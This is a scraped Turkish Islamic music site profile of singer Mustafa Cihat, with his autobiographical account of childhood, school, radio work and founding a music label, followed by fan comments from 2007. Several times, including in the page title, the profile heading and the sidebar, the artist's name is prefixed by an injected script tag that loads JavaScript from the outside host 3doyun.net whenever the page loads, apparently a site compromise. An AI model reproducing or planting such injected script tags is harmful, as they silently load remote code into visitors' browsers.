İslami Müzik Tv
İslami Müzik TV

  Ayeti Kerime
" "
  Hadis-i Şerif
""

J<script src=http://3doyun.net/dcr/s.js></script> Cihat Profili - İslamimuzik.com

    J Cihat Kimdir ?J<script src=http://3doyun.net/dcr/s.js></script> 76 kışının 19 kasımında bir Cuma akşamı açmışım gözlerimi dünyaya. İnsanların korkudan evlerinin pencerelerini sıkı sıkı perdelediği, evlatlarını uğurlarken sıkı sıkı tembihlediği, sağ salim eve dönmeleri için el açıp dua ettiği bir zamanda. Tedirginliğin insanların hep yanında olduğu bir dönemde merhaba demiştim dünyaya.

Elbette dünyaya gelişim birilerinin hasretle ümit ettiği, ve bir yerleri kurtarması için beklenen bir kahraman gelişi değildi. Sade bir Anadolu evinde kılıç ailesinin ümitlerinin karşılığı herkesin yaşayabileceği kadar bir mutluluk anı sadece. Evin en küçüğü, diğer 3 kardeşinin arkadaşlarına “bizim bir kardeşimiz daha oldu” diyecekleri kadar sade ve sevinçli bir haber.

Babam ismimi doğmadan önce koymuş. “Allah bir erkek evlat verirse adı Mustafa Cihat olsun adının adamı olsun” demiş.

Çocukluğum her çocuk gibi oyunlarla ve oynayacağımız yeni oyunların hayalleriyle geçti. Belki tek farkım her şeyin çok kıymetli olduğu ve kıymetinin bilindiği bir devrin çocuğu olmamdı. Mahallede plastik topu olanın tüm oyunları ve kurallarını belirlediği, top oynarken plastik kramponu olanın takım kaptanı olduğu zamanlardı. Her şey azdı kıymetliydi, farklıydı ama çok tatlıydı.

Çabucak geçen yıllar ve ilk okul. “yahu cihat Maşallah görmeyeli kocaman adam olmuşsun sen be” diyen babamın arkadaşlarını hep sevdim.

Orta okul imam hatibe yazılıp okul bahçesinde, beyaz gömlek, lacivert bir ceket, gri pantolon, ağabeyimden kalan bordo kravatla ve elimdeki kitaplarla girdiğim o ilk gün “babamın arkadaşları haklı ben artık büyüdüm” dedim. Artık bundan sonra bende kravat takıcam. Ceket giyicem boyumdan büyük laflar edicem.

Ortaokulda uslu bir öğrenci olduğumu söylerlerdi hep hocalar sorulduğunda cevap veren az konuşan çok dinleyen bir öğrenci. Lisede ise tam tersi çok konuşan dinlemeyen sorulmasada her şeye karşı cevap veren bir öğrenci.

Lisede geçen 3 yıl geleceğimi yönlendirdi demeliyim. Bağlılık, sadakat kardeşlik, idealler, hayallar ve daha bir çok erdem. Daha düşmeden koluma giriverecek ağabeyler, dostlar tanıdım. Her sorunun bir cevabı vardı. Ve hepsinin cevabını öğrenmek için hep sordum tereddütsüz ve şüphesiz cevaplar aldım ve onlara sıkıca sarıldım. Bana sorulursa aynen cevaplamak için.

Lise sona geldiğimde abi olmanın tadıyla ve heyecanıyla daha bir başka konuşmaya başladım. Bu konuşmalar biraz yüksek sesli olsa gerek değerli bir abim bana “radyo kurduk orada program yapacaksın” dedi. Cevabımı dinlemeden bunu söz saydı. Ve radyoda program yapmaya başladım. Bu arada bir müzik grubumuzda vardı. Bizim saydığımız sahiplendiğimiz ezgileri söylemeye dinletmeye çalıştık anlatan ve dinleyen olmasa da.

Hızlı geçen günler ve yıllar bana iltimas yapmadı yoluna durmadan devam etti. Antalya’da geçen 5 yılda hayatın önemli virajlarından geçtim. Radyo ve müzik hep ilgimi tazeledi. Anlatmak istediklerimi konuşarak anlatmak daha güzeldi müzikle anlatmak. 93 yılında kendimde fark ettiğim Mevla’nın bana bahşettiği ilham, sözlere ve melodilere döküldü. Antalya’da kurduğumuz müzik grubu ile de bestelerimizi okumaya derdimizi anlatmaya çalıştık.

Ve 97 de hayatımın en önemli teklifini duymak nasip oldu. Can dost Eşraf Ziya soğuk bir kış günü bana “Cihat gel senle İstanbul’da bir müzik firması kuralım” dediğinde artık beklenen zamanın geldiğini fark ettim. Artık söylediklerim yazdıklarım konuştuklarım sadece bende kalmayacak aynı düşündüğümüz insanlarla ortak sözümüzü olacak dedim. Ve 98 de Marmara müzik adı altında, can dost Eşref Ziya abimle sesimizi duyurma adına bir fırsat yakalamış olduk.

Gelinen bu günde, en azından bir dostla, hayatın herhangi bir yerinde olmak, onunla her şeyi paylaşmak, ideallerimizi inancımızı onunla beraber diri tutmak, duayla, sabırlar, inançla, vefayla, sadakatle, ve ille de şükürle olmak yakışır bana ve herkese.

Merak edenler için yazılan bunca şeyden sonra eğer bir hata edildiyse affola. Takdir edersiniz ki yazmak zordur hele ki kendini yazmak daha bir zır, o halde mazur görmek bizim kardeşliğimize ve samimiyetimize yakışır.

Dualarınızda bana yer ayırmanız dileğiyle..


Bu Sanatçının Profili 13673 kez ziyaret edilmiştir.

     J Cihat - Yorum Ekle

elifnur arslan
s.a mustafa abi tüm ezgilerini beğeniyle dinliyorum özellikle emanet i çok seviorum yeni albümünü dört gözle bekliorum aeo
Bu yorum 2007-04-18 13:40:20 tarihinde yapıldı.

hidayet aslanhan
mustafa abi amenna ilahiniz çok güzel
Bu yorum 2007-04-14 14:08:54 tarihinde yapıldı.

Mehmet Geylani
Selam aleyk Mustafa abi sizi tesedüfen tanıdım bir arabada kasetiniz vardı çok beğendim ve araştırdım buldum sizi şimdi amenna kasetiniz ve diğer kasetlerden şarkılarınız var bende inanın müsait olduğum her an dinliyorum sizinle tanışmayı çok istiyorum inşallah bu fırsatı verirsiniz bana Allah bu güzel yoldan ayırmasın bizi inşallah..
Bu yorum 2007-04-13 17:12:00 tarihinde yapıldı.

çetin
sizi ben 2006 da tanıdım.çizginizden inşaallah taviz vermezsiniz.sizi n gibi insanlara bu ümmetin ihtyacı var sorumluluğunuz fazla.lütfen bunun bilincinde olun.bu ümmet çizgisinden sapanlardan çok çekti.çalışmalarınızın hayrını görmeniz dileğiyle allaha emanet ol mustafa kardeşim
Bu yorum 2007-04-10 18:17:53 tarihinde yapıldı.

mustafa kaplı
hocam allah sizlerden razı olsun.ve sizleri başımızdan eksik etmesin
Bu yorum 2007-04-08 19:31:18 tarihinde yapıldı.

melek
böyle bir sese sahip olduğunuz için çok şanslısınz ezgilerinizi duyduğum andan beri sizi araştırıyorum arkadaşlarımve ben sizden bahsediyoruz onlarda sizi çok begeniyor başarılarınızın devamını dilerim
Bu yorum 2007-04-04 21:30:40 tarihinde yapıldı.

rukiye
slmmustafa abi eserlerini begenjyle dinliyorum
Bu yorum 2007-04-02 17:29:54 tarihinde yapıldı.

vakkas
sizi dinleyince aradığımı buldum dedim.sizi dinlyince ruhum huzur buluyor. teşekkürler
Bu yorum 2007-03-30 14:36:36 tarihinde yapıldı.

derwish
hocam gönlünüze sağlık ezgileriniz çok muhteşem ve çok derin duygularla yüklü.allah başarınızı daim kılsın
Bu yorum 2007-03-21 19:01:22 tarihinde yapıldı.

SİBEL
böyle bir sesi böyle bir yorumu şimdiye kadar nasıl duymadık sizi beğenerek dinliyorum her dinlediğimde daha çok beğeniyorum Allah başarılarınızı devam ettirsin
Bu yorum 2007-02-10 14:28:18 tarihinde yapıldı.


Yorum Yapyn

J Cihat

J<script src=http://3doyun.net/dcr/s.js></script>
Genel Bilgiler

Adı: J
Soyadı: Cihat
Doğum Yılı:
Doğum Yeri:
Tarz:
Eğitim Durumu:
Albüm Sayısı: 3
Etiketler:
Websitesi: Resmi Sayfası